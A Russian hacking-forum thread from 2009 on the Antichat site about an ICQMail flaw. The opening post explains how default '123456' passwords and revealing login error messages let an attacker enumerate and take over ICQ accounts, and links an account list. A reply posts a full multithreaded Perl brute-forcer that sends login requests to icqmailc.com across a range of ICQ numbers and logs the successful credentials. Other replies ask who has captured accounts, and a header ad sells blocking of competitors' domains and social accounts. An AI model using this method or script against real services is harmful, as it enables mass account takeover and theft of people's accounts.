Форум АНТИЧАТ - ICQMAILC.COM

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > ICQ
ICQMAILC.COM - новый баг icq!

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

ICQMAILC.COM - новый баг icq!

28.01.2009, 23:25

Kernet

Постоянный

Регистрация: 28.09.2008

Сообщений: 456

Провел на форуме:
2244151

Репутация: 404

Отправить сообщение для Kernet с помощью ICQ

ICQMAILC.COM - новый баг icq!

Существует три вида известного сервиса «ICQMAIL» (первые два уже в прошлом):

* Старейший icqmail - http://company.icq.com/info/press/press_release29.html
* Прошлый icqmail - http://www.mail2world.net/net/company/pr11-22-2004.asp
* Текущий icqmail (бета) - http://www.icqmail.com/

В ноябре 2004 был найден баг когда ICQ-пользователь использовал старейший ICQ Mail и регистрировал ICQMail-аккаунт, при этом регистрировался также названный AIM-ник (например при регистрации user23456@icqmail.com, регистрировался AIM-ник «user23456»).

Потому что AIM старее, чем ICQMail и потому что множество AIM-ников уже были зарегистрированы, пользователям ICQ сложно было выбрать себе свободный для регистрации ICQMail.

Некоторые люди сделали «брутфорс» и было найдено то, что некоторые из старых ICQMail-аккаунтов имеют уникальный общий пароль — «123456». Было возможно войти в аккаунт ICQMail-аккаунт одного из основателей ICQ (Yair Goldfinger — ICQ# 80000) с паролем: 123456 (сейчас это доступно на icqmailc.com).
Хакер получил возможность взломать ICQMail (двумя различными способами) через универсальный пароль (данный метод работает на некоторых аккаунтах) или взломать admin@icqmail.com который имеет панель управления системы ICQMail (метод работающий на всех ICQMail аккаунтах) в опциях которой, была возможность возвращать ранее упомянутые автоматически созданные AIM-ники, пароли которых совпадали с ICQMail аккаутом привязанным к номеру ICQ. Пароли AIM-ников были равны «p_icqпароль» (например, если на AIM-нике пароль был «p_miracle», пароль на номере ICQ был: miracle). Взломщику нужно было лишь удалить «p_» из пароля к аккаунту AIM для взлома ICQ аккаунта.

Большинство номеров было присоединено к ICQMail, то есть присоединенные к старым ICQMail-аккаунтам (old style ICQMails). Большая часть таких аккаунтов имеет универсальный пароль «123456». Таким образом, влом их был возможен через страницу восстановления пароля AIM-аккаунта — http://www.aim.com/help_faq/forgot_p...d/password.adp

6-го сентября 2008 года много пользователей ICQMail получили данное письмо от администрации ICQ:

И в конце октября 2008 года последний вид ICQMail был запушен (доступен всем он стал немного познее). Новый ICQMail представлял из себя AIMMail. Новый ICQMail был более защищенным потому, что сделан на так-называемой «karma» проверкой ICQ пароля. Первые два ICQMail системы были потерянны, но много пользователей были не довольны потерей содержимого их ICQMail-аккаунтов и администрация ICQ написало следующее сообщение http://www.icq.com/help/view_faq.php?faq_id=8024: «Ваши старые E-Mail не перенесены в новую ICQmail систему. Вы можете видеть старые E-Mail адреса в старой системе www.icqmailc.com, но вы не можете отправлять или получать письма с них.»

Таким образом, предыдущий вид ICQMail доступен на сайте www.icqmailc.com в конце октября. Аккаунты ICQMail на этом сайте совпадают с паролями на предыдущих версиях ICQMail и не совпадают с текущими паролями нового ICQMail. Как было упомянуто много аккаунтов предыдущего ICQMail имеют универсальный пароль «123456» и они имею такой-же пароль на www.icqmailc.com.

Существующий «123456» баг на www.icqmailc.com мог быть использован взломщиками, которые могут сделать сканер, который может проверять какие ICQ-аккаунты имеют ICQMail и какие из них имеют универсальный пароль. Метод сканирования очень простой: номер ICQ может быть введён в поле «ICQMail ID». ICQMail не присоединён если появляется ошибка «Please enter a valid username.». Если к номеру присоединен ICQMail-аккаунт и пароль не «123456», текст ошибки будет содержать «Please enter the correct password for this account.». Иначе, если к номеру ICQ присоединён ICQMail-аккаунт и пароль к нему «123456», то сканер может получить имя ICQMail-аккаунта продолжая вход в систему. Для примера ICQMail ID: 111111, Пароль: 123456, имя аккаунта: glenda111111@icqmail.com

Часто имя аккаунта ICQMail (или первые 8 символов) совпадает с паролем с паролем номера ICQ к которому ICQMail привязан. Для примера: ICQMailID: 203007, Пароль: 123456. Полученный E-Mail: hogemp@icqmail.com, номер ICQ: 203007, пароль: hogemp (конечно сейчас пароль уже другой, но я был информирован что пароль в точности соответствовал)

Простое сканирование аккаунтов icqmailc.com и проверка паролей сделанное хакером может привести к массовому взлому номеров ICQ.

Наверное хорошая идея для исправления данного бага: работа сканера будет не возможна, если администрация ICQ заблокирует вход в icqmailc с номерами ICQ введёнными в ICQMail ID и сделает доступным вход только по E-Mail.

Список ICQMail-аккаунтов 5-6 знаков.

C вами были [ e l i T e ], flabber и .fry

\

sp/
Кул что сказать)

28.01.2009, 23:38

X-Venom

Постоянный

Регистрация: 29.04.2008

Сообщений: 913

Провел на форуме:
10460911

Репутация: 1031

Отправить сообщение для X-Venom с помощью ICQ

статью надо было в уязвимости

29.01.2009, 00:13

Paha007

Участник форума

Регистрация: 02.03.2008

Сообщений: 153

Провел на форуме:
1758769

Репутация: 341

Отправить сообщение для Paha007 с помощью ICQ

Чето я ваще ниче не понял...но всерно спс...
У кого как успехи? кто нибудь что нибудь урвал?

29.01.2009, 00:13

eLWAux

Members of Antichat - Level 5

Регистрация: 15.06.2008

Сообщений: 941

Провел на форуме:
5111568

Репутация: 2399

Отправить сообщение для eLWAux с помощью ICQ

давно известно уже

29.01.2009, 00:18

eLWAux

Members of Antichat - Level 5

Регистрация: 15.06.2008

Сообщений: 941

Провел на форуме:
5111568

Репутация: 2399

forum.asechka.ru/showthread.php?p=489677
+ мой многопоточний брутер )

PHP код:


		
			
#! /usr/bin/perl -w



use IO::Socket;

use warnings;

use threads;

use threads::shared;

use Fcntl ':flock';



#=====] eLwaux [==================================================================

#================================================================================



my $iCQ  : shared = 80000;

my $threads    = 3;



#========================

#== start.. =======

#================================================================================



open (FILE, '<icqmailc.com.pass.txt') || die(" [-] icqmailc.com.pass.txt not found!\n");

my @pas : shared = <FILE>;

chomp(@pas);

close(FILE);



$time      = time; 

printf " [ ] started [".localtime()."]\n\n";



for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}

for(@trl) { $_->join; }



$time = time-$time;

printf "\n [ ] finished [".localtime()."]\n";

printf " [i] time elapsed: $time sec\n";



<stdin>;



sub Brut{



    while($iCQ<999999) #iCQ num #999.999.999

    {    

        {lock($iCQ);$num=$iCQ;$iCQ++;}

        foreach my $psw(@pas){ 



        $post    = 'faction=login&domain=icqmail.com&username='.$num.'&password='.$psw.'&RememberMe=on';

        $header  = 

               "POST http://icqmailc.com/default.asp HTTP/1.1\r\n".

               "Host: icqmailc.com\r\n".

               "User-Agent: icq.icq (icq)\r\n".

               "Referer: http://icqmailc.com\r\n".

               "Content-Type: application/x-www-form-urlencoded\r\n".

               "Cookie: temp=; lang=en; domaincode=icq; remember%5Fme=secure=&Domain=icqmail%2Ecom&autologin=&Username=".$num."&value=TRUE; M2W3=height=800&width=1280; HasSideAd=no; MBXPercent=0%2E7; customguitemp=; welcome=\r\n".

               "Content-Length: ".length($post)."\r\n\r\n".

               "$post\r\n\r\n";

        

        my $sock = sock();

        print $sock $header;            



        while(my $answer = <$sock>){

            if ($answer=~/Content-Length: (\d{1,9})/) {

            if ($1<1000) {print ' [+] '.$num.' : '.$psw."\n";s2f('result.txt','++ '.$num.':'.$psw."\n");}

                    else {print '  -  '.$num.' : '.$psw."\n";s2f('result.txt','-  '.$num.':'.$psw."\n");}

            last;

            }

            if($answer=~/<\/html>/){last;}

        }

        sleep(0.5);

        close($sock);    

        

        

        

        

        }

    }

}



#=============================================================================

#=============================================================================



 sub s2f {

     open(FILE, '>>'.$_[0]);

     print FILE $_[1];

     close(FILE);

     }







#create new socket connection

sub sock {

    my $sock;

    do {

        $sock = new IO::Socket::INET 

            (

                PeerAddr => 'icqmailc.com',

                   PeerPort => 80,

                   PeerProto => 'tcp', 

                   TimeOut => 10

            ) or print "[-] connection error!";

        } while (!$sock);

    return $sock;

}



#=============================================================================

#=============================================================================

29.01.2009, 00:22

Fooog

Постоянный

Регистрация: 19.09.2008

Сообщений: 511

Провел на форуме:
1866685

Репутация: 340

Отправить сообщение для Fooog с помощью ICQ

Отправить сообщение для Fooog с помощью AIM

Отправить сообщение для Fooog с помощью Yahoo

Блин((( я тож ничего не понял(((

29.01.2009, 00:33

Exlibris

Постоянный

Регистрация: 26.02.2007

Сообщений: 495

Провел на форуме:
3835614

Репутация: 1386

Отправить сообщение для Exlibris с помощью ICQ

мдэ, рабочих номерков вроде как уже не осталось, попробовал несколько нумов, пароль не подходит, хотя в мыло заходит...

29.01.2009, 14:25

Kernet

Постоянный

Регистрация: 28.09.2008

Сообщений: 456

Провел на форуме:
2244151

Репутация: 404

Дак мыла могут быть примаками))

29.01.2009, 14:32

iSeoBot

Участник форума

Регистрация: 11.04.2008

Сообщений: 279

Провел на форуме:
998892

Репутация: 217

боянищееееее

#10

29.01.2009, 20:39

hafiz

Участник форума

Регистрация: 08.01.2009

Сообщений: 105

Провел на форуме:
1143094

Репутация: 92

статья хорошая респект автору, токо на ретрив как то они не идут!!! вот что хуже

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ICQ решила нанести новый удар по QIP	MaTpOc	Мировые новости	32	28.01.2009 12:40
Faq по Icq-хакингу	ОТЕЦ	ICQ	3	11.01.2007 16:26
Дырявая "аська" - мифы и реальность	SK \| Heaton	Чужие Статьи	0	22.11.2006 08:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход